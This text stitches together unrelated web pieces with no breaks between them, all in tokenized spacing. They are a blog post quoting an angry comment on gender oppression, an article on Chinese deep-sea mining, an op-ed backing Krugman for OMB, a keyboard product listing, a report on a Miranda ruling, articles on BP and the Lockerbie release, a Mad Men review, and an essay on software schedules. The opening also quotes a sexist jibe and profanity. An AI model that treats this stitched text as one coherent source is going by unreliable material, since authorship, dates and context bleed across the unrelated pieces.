The freedom to be loathed if I 'm fulfilled by expressing myself differently ?
This video is haw - haw women and aggression do n't mix !!
Haha women are dumb when it comes to guns !!!
Hahaha !!!
Gender oppression in America is even more dangerous than that in , say , an Islamic country , because nobody talks about invading and rescuing America .
We fancy ourselves , laughably , as the liberators , when our entire society is bound by oppression .
It is insidious .
We 're all in a prison but refuse to break out because we 've been conditioned to not view it as such .
And you tell me to get a sense of humor .
Fuck you . "
These are pretty powerful words and it really struck me with massive force .
I tried to get in contact with this person but they have n't yet replied to my email .
They go by the name of " mh " .
The demand for metals used in the production of electronic devices , such as cellular phones and laptop computers , has pushed China to the deep sea .
Searching for copper , nickel , cobalt , silver and gold , the Chinese want to explore inactive hydrothermal vents at a depth of over 5,000 feet in international waters .
Environmentalists fear marine pollution .
Hydrothermal vents are geysers , like Old Faithful , existing on the ocean floor .
The University of Delaware explains :
How do hydrothermal vents form ?
In some areas along the Mid-Ocean Ridge , the huge plates that form the Earth ’s crust are moving apart , causing deep cracks in the ocean floor .
Seawater seeps into these openings and is heated by the molten rock , or magma , beneath the crust .
As the water heats up , it rises …
Chimneys top some vents .
These smokestacks are formed from dissolved metals that precipitate out ( form into particles ) when the super - hot vent water meets the surrounding seawater , which is only a few degrees above freezing .
China has filed the first application to the International Seabed Authority ( ISA ) for deep - sea mining in the Indian Ocean .
Although it has not been approved yet , there is concern it will open the door for more permits in international waters .
Given the risks of working at such depths , evident in the Gulf Oil Spill , environmentalists are concerned , especially when many of the sought after metals are considered heavy and toxic .
The Independent describes the concern :
Although no one knows exactly what damage a deep - sea mine would do to the marine ecosystem , experts have no doubt that removing a considerable part of the sea floor would cause a major disturbance .
Not only that , but plumes of sediment – which may well be toxic – could have an impact over a much wider area , especially for filter - feeding marine organisms , which are common on the seabed .
Such plumes might also block out light , hindering the development of plankton .
China already has a monopoly on rare earth metals , and the demand for metals is growing as technology , including green tech , demands it .
Are the risks of marine pollution from deep - sea mining acceptable ?
ISA will decide in April 2011 .
By Simon Johnson
The president should nominate Paul Krugman to replace Peter Orszag as director of the Office of Management and Budget ( OMB ) .
( Orszag resignation details are here . )
We have previously reviewed Krugman ’s outstanding qualifications for this ( or any other top level ) job ( link to details ) .
The main reason Krugman himself has been reluctant in the past relates to a potentially difficult Senate confirmation hearing – for example , if Krugman had been put forward to replace Ben Bernanke .
But for the OMB position , the dynamic of a hearing would be terrific for the president ’s specific agenda and broader messages .
Krugman , of course , is the leading advocate for continued ( or increased ) fiscal stimulus .
This is exactly President Obama ’s message to the G20 this weekend .
Plus , when Republicans push back against Krugman on this issue , he will let them have it full blast on fiscal policy during the Bush administration .
Krugman has , again and again , been an outspoken critic of the Bush era fiscal policy .
He has precise chapter and verse on where the Bush team went off the deep fiscal edge .
Krugman also stands for responsible medium - term fiscal policy – he wrote the original definitive work , after all , on balance of payments crises .
But the point is not to engage in precipitate and panicky fiscal austerity ( as announced in the UK today ) , but rather to put the overall debt onto a sustainable path .
It is very hard to do that when the people claiming the represent “ fiscal prudence ” are actually the ones who created this massive mess in the first place .
Krugman can set the public record straight on this – it would be great television and very good economics .
This is exactly what the debate on our current deficit and future debt path needs .
The Obama administration lost the narrative on this point also ( as well as on banking and much more ) .
Paul Krugman can get them back on track .
Home > USB Products > USB Keyboard > Flexible Bluetooth Mini Keyboard Flexible Bluetooth Mini Keyboard Product Code : UKEYB004900
This Flexible Bluetooth Mini Keyboard is a Bluetooth enabled keyboard , which is strong , silent and indestructible , is made of a high quality silicone material .
It is also storable and portable that users can bring it everywhere .
And , it is water resistant and dustproof that users can clean it easily .
Its flat design also offers an easy typing that prevents your wrists getting stress .
Its ultra-slim and lightweight design can be used for travel , school , or any other working environment with Bluetooth enabled laptop , PC and iPhone / iPad / Android Smartphone / Tablet .
Price : US$ 36.00
Quantity : Tweet Features : 85 keys and 11 hot keys
Silicone surface , concave keycap , ergonomics and stylish design
Creative design , water - proof surface , can be rolled up , silent typing , voice communication and convenient ot carry
Power On / Off button
Built - in rechargeable battery
Wireless Bluetooth transfer
Works in > iPhone / iPad / Android Smartphone / Tablet
Compatible with Mac OS , Windows Mobile , Window 10 / 8 / 7 / Vista / XP / 2000 , Mac OS X v.10.1.10 or above
Dimension : 256 X 92 X 16 mm ( approx . )
Weight : 96g
Package Contents : Flexible Bluetooth Mini Keyboard
USB Retractable Cable User's Manual
Related Products
Slim Bluetooth Handheld keyboard ...
Dual - Connect Slim Bluetooth Keyboard with Mouse Track ...
Rii Mini Wireless Keyboard ...
Bluetooth Slim Keyboard ( i620 ) ...
Bluetooth Folding Keyboard ...
Super Slim Bluetooth Keyboard ( K1280 ) ...
Rii Mini I8 2.4G Mini Wireless Keyboard with Touchpad ...
Bluetooth Multimedia Mini Keyboard with Trackball ...
Enlarge By Jose Luis Magana , AP Supreme Court Justice Sonia Sotomayor says defendants often use equivocal or colloquial language in attempting to invoke their right to silence .
WASHINGTON  A divided Supreme Court scaled back the well - known Miranda right Tuesday and enhanced prosecutors ' ability to assert that a suspect waived his right to remain silent even when he did not say so .
By a 5 - 4 vote , the justices said that once rights have been read and questioning begun , a suspect must clearly declare that he wants to remain silent and cannot simply be silent .
The decision in a Michigan case broke along ideological lines , with Justice Anthony Kennedy writing the opinion , joined by fellow conservatives .
The four liberals dissented in an opinion by Justice Sonia Sotomayor , a former Manhattan prosecutor who warned that the decision " turns Miranda upside down . "
She said defendants often use equivocal or colloquial language in attempting to invoke their right to silence and that requiring a clear declaration would weaken the right .
" There is no question that this decision authorizes lower courts to construe ambiguous situations in favor of police and prosecutors , " said Stanford University law professor Robert Weisberg .
The 1966 Miranda v. Arizona , which protects suspects against self - incrimination and requires police to warn suspects they have a right to remain silent and can have a lawyer present , has been deeply woven into American culture .
Yet it often spurs controversy , as revealed in recent debate over such rights for terrorist suspects arrested in the USA .
Tuesday 's case did not involve when a suspect should be read rights .
Rather , it addressed what happens when a suspect declines to answer hours of questions , then makes a potentially incriminating statement and later says he had wanted to remain silent and that his statement was not made freely .
Van Chester Thompkins , suspected in the 2000 shooting death of Samuel Morris outside a mall in Southfield , Mich. , said little during a nearly three - hour interrogation , at the start of which he was read Miranda warnings .
Two hours and 45 minutes later , an officer asked , " Do you believe in God ? "
Thompkins said yes .
The officer then asked , " Do you pray to God to forgive you for shooting that boy down ? "
Thompkins said " Yes . "
Thompkins was convicted of murder and sentenced to life in prison without parole .
On appeal , he said he invoked his right to remain silent by refusing to answer questions for a long period of time and that his statements should not have been used at trial .
A U.S. appeals court agreed , rejecting Michigan officials ' claim that Thompkins had waived his rights .
U.S. Solicitor General Elena Kagan , representing the Obama administration and now a nominee for the court , sided with Michigan in its appeal .
She said a suspect must clearly assert his right to silence .
The Supreme Court majority agreed .
" Where the prosecution shows that a Miranda warning was given and that it was understood by the accused , an accused 's uncoerced statement establishes an implied waiver of the right to remain silent , " Kennedy wrote .
He said Thompkins waived his right by answering the detective 's questions .
Kennedy was joined by Chief Justice John Roberts and Justices Antonin Scalia , Clarence Thomas and Samuel Alito .
Sotomayor called their decision " a substantial retreat from the protection against compelled self - incrimination . "
She said it undercuts the " heavy burden " the government should have to show that a defendant gave up his right against self - incrimination .
Joining her were Justices John Paul Stevens , Ruth Bader Ginsburg and Stephen Breyer .
Advocates on both sides agreed the court had pared back Miranda .
Kent Scheidegger of the Sacramento - based Criminal Justice Legal Foundation said the court recognized " the practical realities that police face … with suspects . "
Steven Shapiro of the American Civil Liberties Union called the decision a " significant erosion " of Miranda and said the case showed how a suspect can be worn down in questioning .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Hillary Clinton , the US secretary of state , pledged today to look into demands from a group of senators for an investigation into charges that BP lobbied for the release of the Lockerbie bomber as part of an oil - for - terrorist deal .
The oil company also today faced the prospect of being shut out of America after legislation that could ban it from offshore drilling projects for seven years cleared its first hurdle .
With pressure mounting on BP , Clinton responded to reports that it had lobbied the British government for the release of Abdel Basset al - Megrahi to help it clinch lucrative drilling contracts off the coast of Libya .
" I have received the letter and we will obviously look into it , " she said .
At a press conference today , four senators demanded BP put its plans to drill in the Gulf of Sidra on hold unless British and state department investigations clear the company of manoeuvring for Megrahi 's release .
" It is almost too disgusting to fathom that BP had a possible role in securing the release of the Lockerbie terrorist in return for an oil drilling deal , " Charles Schumer , a Democratic senator from New York , told reporters .
Megrahi was convicted in connection with the 1988 bombing of Pan Am flight 103 over Lockerbie in which 270 people died .
He was released on compassionate grounds last August after doctors said he was suffering from cancer and had likely only months to live .
He is still alive after his transfer to Tripoli .
The state department has been sympathetic to anger in the US over Megrahi 's release .
" There was an expectation from last August that Mr Megrahi had only a few months to live , " spokesman PJ Crowley said .
" Every day that he lives as a free man , we think is an affront to the families of and victims of Pan Am 103 . "
The White House added to the pressure on BP today , putting a 24 - hour delay on the oil company 's plans of deploying its new tighter - fitting cap over its fractured well in the Gulf of Mexico so engineers could perform additional safety reviews .
The coast guard commander , Thad Allen , said the oil company got the all - clear to begin pressure tests today .
If successful , the cap could completely stop oil gushing into the Gulf , but the White House was concerned the well pipe would not stand up to additional pressure .
Until the cap is fitted , the untamed well continues to spew oil into the Gulf at a rate of 60,000 barrels a day .
Meanwhile , BP 's future in America looked precarious as Congress took up measures that could severely restrict its activities .
The House committee on natural resources today approved a proposal from a California Democrat , George Miller , that would ban oil companies with a history of violating safety and environmental regulations from new drilling projects .
" One of the things you should bring to this game is a safety record .
You have a company that has had an egregious safety record , a fatal safety record , " Miller said .
On paper , companies would be banned if more than 10 workers are killed at any of their facilities or they have been fined more than $ 10 m for polluting waters , over the previous seven years .
Companies would also have to prove they have paid in full for any damages or clean - up costs resulting from an oil spill .
In reality , however , this would only apply to BP .
The company is expected to face billions in fines for the Gulf disaster , and had a history of safety and environmental violations well before the blow - out in the Gulf of Mexico in April .
Congressional hearings have since zeroed in on BP 's history in the US , which include more than 700 safety and environmental violations over the last five years – compared with fewer than 10 for the other big oil companies .
Most of those violations were for projects outside the world of offshore drilling , including a 2005 explosion at a Texas refinery that killed 15 workers and a badly maintained pipeline that spewed 200,000 gallons of oil along Alaska 's North Slope .
The ban would not apply to existing leases , and would still allow BP to act as a minority partner on leases .
But another amendment , due to be taken up tomorrow , would require the government to consider an oil company 's safety record before awarding offshore leases rather than choose the highest bidder .
" We allow them to drill no matter what their environmental , safety or public health record may be , " Bart Stupak , the Michigan Democrat who proposed the amendment , told a small group at the Platts Energy Forum .
" I think we have to give the secretary the discretion to say : ' Look you have got such a history here .
You are not going to be allowed to drill unless you clean up your act ' . "
Stupak said the reports of a Lockerbie bombing link could provoke additional congressional investigations into BP activities .
The company is also facing months , if not years , of congressional scrutiny .
Stupak added that he expected the investigation to dominate the next chair of the oversight and investigation committee .
BP's Megrahi plea
Claims made by US senators yesterday that BP lobbied for the release of Abdelbaset al - Megrahi , the man convicted of the Lockerbie bombing , as part of an oil - for - terrorist deal are not out of the blue .
Last September then justice minister , Jack Straw , admitted that Britain had been partly motivated by the need to secure fresh oil contracts when ministers tried , in 2007 , to make it easier to release Megrahi .
Straw accepted in an interview that he had decided in 2007 to drop his plan to exclude the bomber from a prisoner transfer agreement ( PTA ) which was being negotiated with Libya .
Straw 's change of mind followed lobbying by UK oil interests , notably BP , and the Libyan government .
Straw was lobbied on 15 October and 9 November 2007 by Sir Mark Allen , a former MI6 officer , who then worked for BP as a consultant .
Libya was stalling on a £ 500 m - plus oil deal with BP .
Documents last year showed Straw originally promised a PTA would only be reached with Libya if Megrahi was excluded .
But he later acceded to Libyan demands to include Megrahi .
The change followed a warning from BP that not including the bomber could hurt its business interests .
When asked in a Daily Telegraph interview last year if trade and BP were factors , Straw said : " Yes , [ it was ] a very big part of that .
I 'm unapologetic about that ... Libya was a rogue state .
" We wanted to bring it back into the fold .
And yes , that included trade … and subsequently there was the BP deal , " Straw said .
A spokesman for BP said the company had raised concerns with the government about the slow progress in concluding the PTA , but denied mentioning Megrahi .
Megrahi was released by the Scottish government last year on compassionate ground , because a terminal illness meant he only had a short time to live .
But since his return to Libya , he has remained alive .
In a further complication , some argue that the evidence used to convict Megrahi was flawed , and that he is in fact innocent of the Lockerbie bombing .
' Mad Men ' season four : Why Betty is already bugging me
By Jen Chaney
Betty Francis : looking upbeat and easygoing , as always .
( AMC )
Let me start by saying this about Betty Francis , formerly Draper of TV's " Mad Men " : I have , on more than one occasion , carried a measure of sympathy for her .
Betty is a product of the era that preceded her current one , a simple housewife of the '50s attempting to move through the '60s in impossibly flouncy skirts and high heels .
She has no sense of self and an existence stifled by the daily suburban grind of backyard parties , cocktail hours and , at least when she was with Don , a perpetually adulterous husband .
I have felt for her .
I really have .
But with just one episode of the fourth season of " Mad Men " behind us , one thing is clear : Betty is really starting to bug me .
Betty 's chilly incompetence as a mother has already been well - documented by a number of sources , including January Jones , the actress who plays her .
Oh , and also this widely distributed New York Magazine video compilation dubbed " Ugly Betty " :
But her behavior in Sunday 's " Public Relations , " as I describe below in list form , takes things to a new level of self - absorption - dressed - up - in - Grace - Kelly clothes .
Annoying Behavior No. 1 : She actually married Henry Francis .
It was pretty clear from the season three finale that she would follow through with her plan to leave Don and become the wife of Gov. Rockefeller 's PR man .
But how disappointing .
All she 's done is run from one man who tried to control her to another one who , potentially , could be even more controlling .
( Did n't he advise Betty not to seek any alimony or financial support from Don in their divorce ?
In the words of Seth and Amy : Really , Betty ?
Really !?!)
Annoying Behavior No. 2 : The sweet potato force - feeding .
Sally Draper does n't care for sweet potatoes .
You know what ?
Last I checked , Sally Draper lives in an America of yesteryear .
And in that America of yesteryear , that little cherub - cheeked girl does n't have to scarf down some marshmallow - and - yam mush if she does n't want to .
But does Betty realize this , let it go and not worry if Sally 's rejection of her Thanksgiving meal will reflect poorly in the eyes of the Francis family ?
Of course not .
Instead , she forces her to eat those potatoes , prompting poor Sally to essentially barf them right back up on the table .
Betty , let that be a lesson to you .
If you love someone , set their eating habits free .
Otherwise , it 's all going to come back to you , in the form of borderline potato - vomit on a crisply - pressed tablecloth .
Annoying Behavior No. 3 : Severing Sally 's phone call with Don. Betty chose to leave Don .
Some might say she had good reason , what with Don cheating on her right and left and maintaining an entirely secret life and all .
But that 's no reason for Betty to prevent her daughter -- the same girl undoubtedly still suffering trauma due to the aforementioned sweet potato incident -- from talking to her daddy on Thanksgiving , even if her daddy is very busy getting slapped by a hooker .
Annoying Behavior No. 4 : Preventing Don from seeing baby Gene .
At the mere suggestion from Henry that perhaps the baby should stay with Carla so the two can have a night out , Betty follows through , thereby preventing Don from seeing the infant when he drops off Sally and Bobby after a visit .
Henry is manipulating Betty , and Betty -- mindless , malleable , man-dependent Betty -- is letting it happen .
I know , I know : Betty 's inability to think for herself and be unselfish is society 's fault .
Annoying Behavior No. 5 : Refusing to vacate the premises : Betty will not move out of the Draper home , despite the fact that Don is still covering the mortgage .
She says she does n't want to cause any more instability for the children , which is understandable .
Or it would be , if she was n't busy snapping at the kids and shoving grub in their faces every other second .
In truth , it seems Betty just wants to hang on to the life she once had and has simply inserted Henry into the role Don once played .
And let 's be honest : she does n't know the real Husband No. 2 any better than she knew the real Husband No. 1 .
And that may be the most annoying thing of all when it comes to Betty Francis - Draper : that she invariably gets frustrated about being kept in the dark yet refuses to shine a genuine light on the people she supposedly loves .
Am I being too hard on Betty ?
And , in a related question , is it possible she 'll get even more annoying as the season continues ?
Weigh in with a comment .
But please , do n't make anyone eat any potatoes if they are n't hungry .
This article is obsolete .
Over the years , I ’ve learned a lot more about schedules and estimates .
A newer , far better method for producing accurate software schedules painlessly is Evidence - Based Scheduling .
Read that instead .
This article remains here for archival purposes , but please do n’t read it !
Last October , the Northeast US was plastered with ads for something called Acela , a new express train running from Boston to Washington .
With TV ads , billboards , and posters everywhere , you ’d think that it would have created some demand for Amtrak ’s new express service .
Well , maybe .
Amtrak did n’t get a chance to find out .
Acela was delayed , and delayed again , so the marketing campaign played out while Acela service was n’t even available .
Which reminded me of something I heard a marketing manager say when his product got a rave review one month before it went on sale : “ Great publicity !
Too bad you ca n’t buy the dang thing ! ”
Testosterone - crazed game companies like to brag on their web sites that the next game will ship “ when it ’s ready ” .
Schedule ?
We do n’t need no stinkin’ schedule !
We ’re cool game coders !
Most companies do n’t get that luxury .
Ask Lotus .
When they first shipped 123 version 3.0 , it required an 80286 computer , which was n’t very common then .
They delayed the product by 16 months while they worked to shoehorn it into the 640 K memory limit of the 8086 .
By the time they were done , Microsoft had a 16 month lead in developing Excel , and , in a great karmic joke , the 8086 was obsolete anyway !
As I write this , Netscape ’s 5.0 web browser is almost two years late .
Partially , this is because they made the suicidal mistake of throwing out all their code and starting over : the same mistake that doomed Ashton - Tate , Lotus , and Apple ’s MacOS to the recycle - bins of software history .
Netscape has seen its browser share go from about 80 % to about 20 % during this time , all the while it could do nothing to address competitive concerns , because their key software product was disassembled in 1000 pieces on the floor and was in no shape to drive anywhere .
That single bad decision , more than anything else , was the nuclear bomb Netscape blew itself up with .
( Jamie Zawinski ’s world - famous tantrum has the details ) .
So , you have to make a schedule .
This is something almost no programmer wants to do .
In my experience , the vast majority just try to get away with not making a schedule at all .
Of the few that make a schedule , most are only doing it because their boss made them do it , halfheartedly , and nobody actually believes the schedule except for upper management , which simultaneously believes that “ no software project is ever on time ” and in the existence of UFOs .
So why does n’t anybody make a schedule ?
Two key reasons .
One , it ’s a real pain .
Two , nobody believes that it ’s worth anything .
Why go to all the trouble working on a schedule if it ’s not going to be right ?
There is a perception that schedules are consistently wrong , and only get worse as time goes on , so why suffer for naught ?
Here ’s a simple , painless way to make schedules that are actually correct .
1 ) Use Microsoft Excel .
Do n’t use anything fancy like Microsoft Project .
The trouble with Microsoft Project is that it assumes that you want to spend a lot of time worrying about dependencies .
A dependency is when you have two tasks , one of which must be completed before the next one can begin .
I ’ve found that with software , the dependencies are so obvious that it ’s just not worth the effort to formally keep track of them .
Another problem with Project is that it assumes that you ’re going to want to be able to press a little button and “ rebalance ” the schedule .
Inevitably , this means that it ’s going to rearrange things and reassign things to different people .
For software , this just does n’t make sense .
Programmers are not interchangeable .
It takes seven times longer for John to fix Rita ’s bug than for Rita to fix Rita ’s bug .
And if you try to put your UI programmer on a WinSock problem , she ’ll stall and waste a week getting up to speed on WinSock programming .
The bottom line is that Project is designed for building office buildings , not software .
2 ) Keep it Simple .
The standard format I use for schedules is so simple you can memorize it .
You start with just seven columns :
If you have several developers , you can either keep a separate sheet for each developer , or you can make a column with the name of the developer working on each task .
3 ) Each feature should consist of several tasks .
A feature is something like adding a spell checker to your program .
Adding a spell checker consists of quite a few discrete tasks that the programmer has to do .
The most important part of making a schedule is making this list of tasks .
Thus the cardinal rule :
4 ) Only the programmer who is going to write the code can schedule it .
Any system where management writes a schedule and hands it off to programmers is doomed to fail .
Only the programmer who is going to do the work can figure out what steps they will need to take to implement that feature .
And only the programmer can estimate how long each one will take .
5 ) Pick very fine grained tasks .
This is the most important part to making your schedule work .
Your tasks should be measured in hours , not days .
( When I see a schedule measured in days , or even weeks , I know it ’s not real ) .
You might think that a schedule with fine grained tasks is merely more precise .
Wrong !
Very wrong !
When you start with a schedule with rough tasks and then break it down into smaller tasks , you will find that you get a different result , not just a more precise one .
It is a completely different number .
Why does this happen ?
When you have to pick fine grained tasks , you are forcing yourself to actually figure out what steps you are going to have to take .
Write subroutine foo .
Create dialog such and such .
Read the wawa file .
These steps are easy to estimate , because you ’ve written subroutines , created dialogs , and read wawa files before .
If you are sloppy , and pick big “ chunky ” tasks ( “ implement grammar correction ” ) , then you have n’t really thought about what you are going to do .
And when you have n’t thought about what you ’re going to do , you just ca n’t know how long it will take .
As a rule of thumb , each task should be from 2 to 16 hours .
If you have a 40 hour ( one week ) task on your schedule , you ’re not breaking it down enough .
Here ’s another reason to pick fine grained tasks : it forces you to design the damn feature .
If you have a hand - wavy feature called “ Internet Integration ” and you schedule 3 weeks for it , you are doomed , buddy .
If you have to figure out what subroutines you ’re going to write , you are forced to pin down the feature .
By being forced to plan ahead at this level , you eliminate a lot of the instability in a software project .
6 ) Keep track of the original and current estimate .
When you first add a task to the schedule , estimate how long it ’s going to take in hours and put that in both the Orig[ inal ] Est[imate ] and Curr[ent ] Est[imate ] columns .
As time goes on , if a task is taking longer ( or shorter ) than you thought , you can update the Curr Est column as much as you need .
This is the best way to learn from your mistakes and teach yourself how to estimate tasks well .
Most programmers have no idea how to guess how long things will take .
That ’s okay .
As long as you are continuously learning and continuously updating the schedule as you learn , the schedule will work .
( You may have to cut features or slip , but the schedule will still be working correctly , in the sense that it will constantly be telling you when you have to cut features or slip ) .
I ’ve found that most programmers become very good schedulers with about one year of experience .
When the task is done , the Curr Est and Elapsed fields will be the same , and the Remain field will recalc to 0 .
7 ) Update the elapsed column every day .
You do not really have to watch your stopwatch while you code .
Right before you go home , or go to sleep under the desk if you ’re one of those geeks , pretend you ’ve worked for 8 hours ( ha ! ) , figure out which tasks you ’ve worked on , and sprinkle about 8 hours in the elapsed column accordingly .
The remaining time field is then calculated automatically by Excel .
At the same time , update the Curr Est column for those tasks to reflect the new reality .
Updating your schedule daily should only take about two minutes .
That ’s why this is the Painless Schedule Method — it ’s quick and easy .
8 ) Put in line items for Vacations , Holidays , etc .
If your schedule is going to take about a year , each programmer will probably take 10 to 15 days of vacation .
You should have a feature in your schedule called vacations , one for holidays , and anything else that consumes people ’s time .
The idea is that the ship date can be calculated by adding up the remaining time column and dividing by 40 — that ’s how many weeks of work are left , including everything .
9 ) Put debugging time into the schedule !
Debugging is the hardest to estimate .
Think back to the last project you worked on .
Chances are , debugging took from 100 % – 200 % of the time it took to write the code in the first place .
This has to be a line item in the schedule , and it will probably be the largest line item .
Here ’s how it works .
Let ’s say a developer is working on wawa .
The Orig Est was 16 hours , but so far it has taken 20 hours and it looks like it needs another 10 hours of work .
So the developer enters 30 under Curr Est and 20 under elapsed .
At the end of the milestone , all these “ slips ” have probably added up to quite a bit .
Theoretically , to accommodate these slips , we have to cut features in order to ship on time .
Luckily , the first feature we can cut is this great big feature called Buffer which has lots o’ hours already allocated for it .
In principle , developers debug code as they write it .
A programmer should never , ever work on new code if they could instead be fixing bugs .
The bug count must stay as low as possible at all times , for two reasons :
1 ) It ’s easier to fix bugs the same day you wrote the code .
It can be very hard and time - consuming to fix bugs a month later when you ’ve forgotten exactly how the code works .
2 ) Fixing bugs is like doing science .
It is impossible to estimate when you will make the discovery and solve the bug .
If there are only one or two outstanding bugs at any given time , it ’s easy to estimate when the product will ship , because there ’s not much un-estimateable science in your future .
On the other hand , if there are hundreds or thousands of outstanding bugs , it is impossible to predict when they will all be fixed .
If developers always fix bugs as they go along , what ’s the point in having a debugging line item ?
Well , even if you try to fix every bug as you go along , at the end of every milestone , there is inevitably a lot of bug fixing when testers ( internal and beta ) find the really hard bugs .
10 ) Put integration time into the schedule .
If you have more than one programmer , inevitably , there will be stuff that two programmers do that is inconsistent and needs to be reconciled .
They might both implement dialog boxes for similar things that are unnecessarily inconsistent .
Somebody will have to go through all the menus , keyboard accelerators , toolbar tools , etc. , cleaning up and organizing all the new menu items that everybody has been adding willy - nilly .
There will be compiler errors that show up as soon as two people check in code .
This has to be fixed , and it should be a line item on the schedule .
11 ) Put buffer into the schedule .
Things tend to run over .
There are two important kinds of buffer you might want to consider .
First : buffer to account for tasks that took longer than originally estimated .
Second : buffer to account for tasks that you did n’t know you would have to do , usually because management has decided that implementing wawa is SUPER IMPORTANT and can not be left out of the next release .
You may be surprised to find that vacations , holidays , debugging , integration , and buffer time add up to more than the actual tasks do .
If you ’re surprised by this , you have n’t been programming for long , have you ?
Ignore these at your peril .
12 ) Never , ever let managers tell programmers to reduce an estimate .
Many rookie software managers think that they can “ motivate ” their programmers to work faster by giving them nice , “ tight ” ( unrealistically short ) schedules .
I think this kind of motivation is brain - dead .
When I ’m behind schedule , I feel doomed and depressed and unmotivated .
When I ’m working ahead of schedule , I ’m cheerful and productive .
The schedule is not the place to play psychological games .
If your manager makes you reduce an estimate , here ’s what to do .
Create a new column in the schedule called Rick ’s Estimate ( assuming your name is Rick , of course . )
Put your estimate in there .
Let your manager do whatever she wants with the Curr Est column .
Ignore your manager ’s estimates .
When the project is done , see who was closer to reality .
I ’ve found that just threatening to do this works wonders , especially when your manager realizes that they ’ve just gotten into a contest to see how slowly you can work !
Why do inept managers try to get programmers to reduce estimates ?
When the project begins , the technical managers go off , meet with the business people , and come up with a list of features which they think would take about 3 months , but would really take 9 .
When you think of writing code without thinking about all the steps you have to take , it always seems like it will take n time , when in reality it will probably take more like 3n time .
When you do a real schedule , you add up all the tasks and realize that the project is going to take much longer than originally thought .
Reality sinks in .
Inept managers try to address this by figuring out how to get people to work faster .
This is not very realistic .
You might be able to hire more people , but they need to get up to speed and will probably be working at 50 % efficiency for several months ( and dragging down the efficiency of the people who have to mentor them ) .
Anyway , in this market , adding good programmers is going to take 6 months .
You might be able to get 10 % more raw code out of people temporarily at the cost of having them burn out 100 % in a year .
Not a big gain , and it ’s a bit like eating your seed corn .
You might be able to get 20 % more raw code out of people by begging everybody to work super hard , no matter how tired they get .
Boom , debugging time doubles .
An idiotic move that backfires in a splendidly karmic way .
But you can never get 3n from n , ever , and if you think you can , please email me the stock ticker of your company so I can short it .
13 ) A schedule is like wood blocks .
If you have a bunch of wood blocks , and you ca n’t fit them into a box , you have two choices : get a bigger box , or remove some blocks .
If you thought you could ship in 6 months , but you have 12 months on the schedule , you are either going to have to delay shipping , or find some features to delete .
You just ca n’t shrink the blocks , and if you pretend you can , then you are merely depriving yourself of a useful opportunity to actually see into the future by lying to yourself about what you see there .
And you know , the other great byproduct of keeping schedules like this is that you are forced to delete features .
Why is this good ?
Suppose you have two features : one which is really useful and will make your product really great ( example : tables in Netscape 2.0 ) , and another one which is really easy and which the programmers would love to code ( example : the BLINK tag ) , but which serves no useful or marketing purpose .
If you do n’t make a schedule , the programmers will do the easy / fun feature first .
Then they ’ll run out of time , and you will have no choice but to slip the schedule to do the useful / important feature .
If you do make a schedule , even before you start working , you ’ll realize that you have to cut something , so you ’ll cut the easy / fun feature and just do the useful / important feature .
By forcing yourself to chose some features to cut , you wind up making a more powerful , better product with a better mix of good features that ships sooner .
I remember working on Excel 5 .
Our original feature list was huge and would have gone way over schedule .
Oh my !
we thought .
Those are all super important features !
How can we live without a macro editing wizard ?
As it turns out , we had no choice , and we cut what we thought was “ to the bone ” to make the schedule .
Everybody felt unhappy about the cuts .
To assuage our feelings , we simply told ourselves that we were n’t cutting the features , we were simply deferring them to Excel 6 , since they were less important .
As Excel 5 was nearing completion , I started working on the Excel 6 spec with a colleague , Eric Michelman .
We sat down to go through the list of “ Excel 6 ” features that had been cut from the Excel 5 schedule .
We were absolutely shocked to see that the list of cut features was the shoddiest list of features you could imagine .
Not one of those features was worth doing .
I do n’t think a single one of them was ever done , even in the next three releases .
The process of culling features to fit a schedule was the best thing we could have done .
If we had n’t done this , Excel 5 would have taken twice as long and included 50 % useless crap features .
( I have absolutely no doubt that this is exactly what ’s happening to Netscape 5 / Mozilla : they have no schedule , they have no definitive feature list , nobody was willing to cut any features , and they just never shipped .
When they do ship , they ’ll have lots of poxy features like IRC clients that they just should n’t have been spending time on . )
Appendix :
Things you should know about Excel
One of the reasons that Excel is such a great product for working on software schedules is that the only thing most Excel programmers use Excel for is maintaining their software schedules !
( Not many of them are running business what - if scenarios … these are programmers , here ! )
Shared Lists Using the File / Shared Lists command allows everyone to open the file at the same time and edit things at the same time .
Since your whole team should be updating the schedule constantly , this really helps .
Auto Filter
This is a great way to filter the schedule so that , for example , you only see all of the features that are assigned to you .
Combined with Auto Sort , you can see all of the features assigned to you in order of priority which is effectively your “ to do ” list .
Cooooool !
Pivot Tables
This is a great way to see summaries and crosstabulations .
For example , you can make a chart showing the remaining hours for each developer for each priority .
Pivot Tables are like sliced bread and chocolate milkshakes .
You gotta learn how to use them because they make Excel a million times more powerful .
The WORKDAY Function from Excel ’s Analysis Toolpak is a great way to get calendar dates out of a Painless Schedule .
Some Q&A on this article : Juggling Tasks in Excel
Safari Software ships a free Excel template , MasterList - XL for task management based on these principles .
